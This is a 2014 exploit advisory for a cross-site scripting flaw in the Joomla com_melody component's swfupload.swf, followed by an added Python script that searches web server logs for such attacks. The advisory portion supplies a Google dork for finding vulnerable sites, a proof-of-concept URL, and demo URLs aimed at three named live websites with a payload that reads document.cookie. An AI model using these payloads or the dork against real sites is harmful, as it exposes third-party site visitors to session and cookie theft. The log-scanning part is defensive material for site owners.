[+] Author: TUNISIAN CYBER
[+] Exploit Title: Joomla Component com_melody XSS Vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"components/com_melody/"
[+] Tested on: KaliLinux
[+] Friend's blog: www.na3il.com
########################################################################################
+Exploit:
The Joomla melody component (com_melody) suffers from an XSS vulnerability in the buttonText parameter of its bundled swfupload.swf.

+P.O.C:
127.0.0.1/[PATH]/components/com_melody/assets/swfupload/swfupload.swf?buttonText=XSS

Demo:
http://www.lachost.net/choir/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E
http://nettlys.no/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E
godsstream.com/~domain20/components/com_melody/assets/swfupload/swfupload.swf?buttonText=XSS

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
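
For site owners checking whether this has been tried against them, the following is an added example (not part of the original advisory) that scans web server access logs for requests to the component's swfupload.swf whose decoded buttonText value carries markup or a javascript: URI. It assumes combined-format log lines; the function name, the `/site` prefix and the sample log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the Flash file named in the advisory's P.O.C.
SWF_PATH = "/components/com_melody/assets/swfupload/swfupload.swf"
# Markup or script-scheme indicators in a decoded buttonText value.
SUSPICIOUS = re.compile(r"[<>]|javascript\s*:", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_requests(log_lines):
    """Return (line_no, decoded buttonText) for suspicious requests to the SWF."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # The component may sit under any site prefix, so match on the suffix.
        if not url.path.lower().endswith(SWF_PATH):
            continue
        # parse_qs percent-decodes each value before we inspect it.
        values = parse_qs(url.query, keep_blank_values=True).get("buttonText", [])
        for value in values:
            if SUSPICIOUS.search(value):
                hits.append((line_no, value))
    return hits

# Constructed sample entries (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jan/2014:10:00:01 +0000] "GET /components/com_melody'
    '/assets/swfupload/swfupload.swf?buttonText=Upload HTTP/1.1" 200 12345',
    '198.51.100.7 - - [09/Jan/2014:10:00:05 +0000] "GET /site/components'
    '/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27'
    'javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E HTTP/1.1" 200 12345',
    '192.0.2.11 - - [09/Jan/2014:10:00:09 +0000] "GET /index.php?buttonText='
    '%3Cb%3E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line_no, value in flag_requests(SAMPLE_LOG):
        print(f"line {line_no}: buttonText={value!r}")
```

A hit shows that the request was made, not that a visitor's browser executed it, so correlate flagged lines with referrers and session activity.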